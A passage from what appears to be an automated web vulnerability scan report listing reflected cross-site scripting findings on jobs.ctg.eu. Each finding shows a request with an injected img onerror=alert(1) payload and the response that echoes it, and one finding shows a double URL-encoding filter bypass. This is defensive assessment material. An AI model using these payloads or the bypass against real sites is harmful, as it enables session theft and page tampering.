The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41960"><img%20src%3da%20onerror%3dalert(1)>bb9a86cebe9 was submitted in the REST URL parameter 2. This input was echoed as 41960"><img src=a onerror=alert(1)>bb9a86cebe9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /modules/system41960"><img%20src%3da%20onerror%3dalert(1)>bb9a86cebe9/system.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:32:03 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:32:04 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6693

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="modules-system41960"><img src=a onerror=alert(1)>bb9a86cebe9-system.css not-front not-logged-in page-modules no-sidebars">
...[SNIP]...

3.41. http://jobs.ctg.eu/modules/system/system.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /modules/system/system.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae674"><img%20src%3da%20onerror%3dalert(1)>1a80ccbe22f was submitted in the REST URL parameter 3. This input was echoed as ae674"><img src=a onerror=alert(1)>1a80ccbe22f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /modules/system/system.cssae674"><img%20src%3da%20onerror%3dalert(1)>1a80ccbe22f?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:33:15 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:33:16 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6693

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="modules-system-system.cssae674"><img src=a onerror=alert(1)>1a80ccbe22f not-front not-logged-in page-modules no-sidebars">
...[SNIP]...

3.42. http://jobs.ctg.eu/modules/user/user.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /modules/user/user.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f56d7"><img%20src%3da%20onerror%3dalert(1)>18564c695ef was submitted in the REST URL parameter 1. This input was echoed as f56d7"><img src=a onerror=alert(1)>18564c695ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /modulesf56d7"><img%20src%3da%20onerror%3dalert(1)>18564c695ef/user/user.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:30:41 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:30:41 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="modulesf56d7"><img src=a onerror=alert(1)>18564c695ef-user-user.css not-front not-logged-in page-modulesf56d7img-srca-onerroralert118564c695ef no-sidebars">
...[SNIP]...

3.43. http://jobs.ctg.eu/modules/user/user.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /modules/user/user.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 384dd"><img%20src%3da%20onerror%3dalert(1)>cb03368af2d was submitted in the REST URL parameter 2. This input was echoed as 384dd"><img src=a onerror=alert(1)>cb03368af2d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /modules/user384dd"><img%20src%3da%20onerror%3dalert(1)>cb03368af2d/user.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:31:57 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:31:57 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6689

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="modules-user384dd"><img src=a onerror=alert(1)>cb03368af2d-user.css not-front not-logged-in page-modules no-sidebars">
...[SNIP]...

3.44. http://jobs.ctg.eu/modules/user/user.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /modules/user/user.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcae4"><img%20src%3da%20onerror%3dalert(1)>8e144cc5a4f was submitted in the REST URL parameter 3. This input was echoed as bcae4"><img src=a onerror=alert(1)>8e144cc5a4f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /modules/user/user.cssbcae4"><img%20src%3da%20onerror%3dalert(1)>8e144cc5a4f?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:33:08 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:33:08 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6689

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="modules-user-user.cssbcae4"><img src=a onerror=alert(1)>8e144cc5a4f not-front not-logged-in page-modules no-sidebars">
...[SNIP]...

3.45. http://jobs.ctg.eu/sites/all/modules/antispam/antispam.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/antispam/antispam.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1d6e"><img%20src%3da%20onerror%3dalert(1)>39ce1ac88d4 was submitted in the REST URL parameter 1. This input was echoed as b1d6e"><img src=a onerror=alert(1)>39ce1ac88d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sitesb1d6e"><img%20src%3da%20onerror%3dalert(1)>39ce1ac88d4/all/modules/antispam/antispam.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:33:40 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:33:40 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6742

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sitesb1d6e"><img src=a onerror=alert(1)>39ce1ac88d4-all-modules-antispam-antispam.js not-front not-logged-in page-sitesb1d6eimg-srca-onerroralert139ce1ac88d4 no-sidebars">
...[SNIP]...

3.46. http://jobs.ctg.eu/sites/all/modules/antispam/antispam.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/antispam/antispam.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 983d6"><img%20src%3da%20onerror%3dalert(1)>da38364a609 was submitted in the REST URL parameter 2. This input was echoed as 983d6"><img src=a onerror=alert(1)>da38364a609 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all983d6"><img%20src%3da%20onerror%3dalert(1)>da38364a609/modules/antispam/antispam.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:35:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:35:43 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all983d6"><img src=a onerror=alert(1)>da38364a609-modules-antispam-antispam.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.47. http://jobs.ctg.eu/sites/all/modules/antispam/antispam.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/antispam/antispam.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5fb9"><img%20src%3da%20onerror%3dalert(1)>1733aaca289 was submitted in the REST URL parameter 3. This input was echoed as a5fb9"><img src=a onerror=alert(1)>1733aaca289 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modulesa5fb9"><img%20src%3da%20onerror%3dalert(1)>1733aaca289/antispam/antispam.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:37:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:37:26 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modulesa5fb9"><img src=a onerror=alert(1)>1733aaca289-antispam-antispam.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.48. http://jobs.ctg.eu/sites/all/modules/antispam/antispam.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/antispam/antispam.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b934a"><img%20src%3da%20onerror%3dalert(1)>9153850d8df was submitted in the REST URL parameter 4. This input was echoed as b934a"><img src=a onerror=alert(1)>9153850d8df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modules/antispamb934a"><img%20src%3da%20onerror%3dalert(1)>9153850d8df/antispam.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:39:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:39:08 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules-antispamb934a"><img src=a onerror=alert(1)>9153850d8df-antispam.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.49. http://jobs.ctg.eu/sites/all/modules/antispam/antispam.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/antispam/antispam.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70579"><img%20src%3da%20onerror%3dalert(1)>61f4e445c3a was submitted in the REST URL parameter 5. This input was echoed as 70579"><img src=a onerror=alert(1)>61f4e445c3a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modules/antispam/antispam.js70579"><img%20src%3da%20onerror%3dalert(1)>61f4e445c3a?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:41:02 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:41:02 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules-antispam-antispam.js70579"><img src=a onerror=alert(1)>61f4e445c3a not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.50. http://jobs.ctg.eu/sites/all/modules/antispam/antispam.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/antispam/antispam.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4af12%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253eaec5804153d was submitted in the REST URL parameter 5. This input was echoed as 4af12"><img src=a onerror=alert(1)>aec5804153d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sites/all/modules/antispam/antispam.js4af12%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253eaec5804153d?L HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: jobs.ctg.eu

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 17:15:44 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: SESS5fce01b171785c9633d86359009a9819=2f46511fc703c84f06d7bac34b7f258f; expires=Sun, 15-May-2011 20:49:05 GMT; path=/; domain=.jobs.ctg.eu
Last-Modified: Fri, 22 Apr 2011 17:15:45 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules-antispam-antispam.js4af12"><img src=a onerror=alert(1)>aec5804153d not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.51. http://jobs.ctg.eu/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/cck/modules/fieldgroup/fieldgroup.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e463"><img%20src%3da%20onerror%3dalert(1)>cdfba77e90c was submitted in the REST URL parameter 1. This input was echoed as 7e463"><img src=a onerror=alert(1)>cdfba77e90c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites7e463"><img%20src%3da%20onerror%3dalert(1)>cdfba77e90c/all/modules/cck/modules/fieldgroup/fieldgroup.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:33:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:33:43 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6759

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites7e463"><img src=a onerror=alert(1)>cdfba77e90c-all-modules-cck-modules-fieldgroup-fieldgroup.css not-front not-logged-in page-sites7e463img-srca-onerroralert1cdfba77e90c no-sidebars">
...[SNIP]...

3.52. http://jobs.ctg.eu/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/cck/modules/fieldgroup/fieldgroup.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae427"><img%20src%3da%20onerror%3dalert(1)>69860021042 was submitted in the REST URL parameter 2. This input was echoed as ae427"><img src=a onerror=alert(1)>69860021042 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/allae427"><img%20src%3da%20onerror%3dalert(1)>69860021042/modules/cck/modules/fieldgroup/fieldgroup.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:35:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:35:43 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-allae427"><img src=a onerror=alert(1)>69860021042-modules-cck-modules-fieldgroup-fieldgroup.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.53. http://jobs.ctg.eu/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/cck/modules/fieldgroup/fieldgroup.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0fad"><img%20src%3da%20onerror%3dalert(1)>1d2bbd370ba was submitted in the REST URL parameter 3. This input was echoed as a0fad"><img src=a onerror=alert(1)>1d2bbd370ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

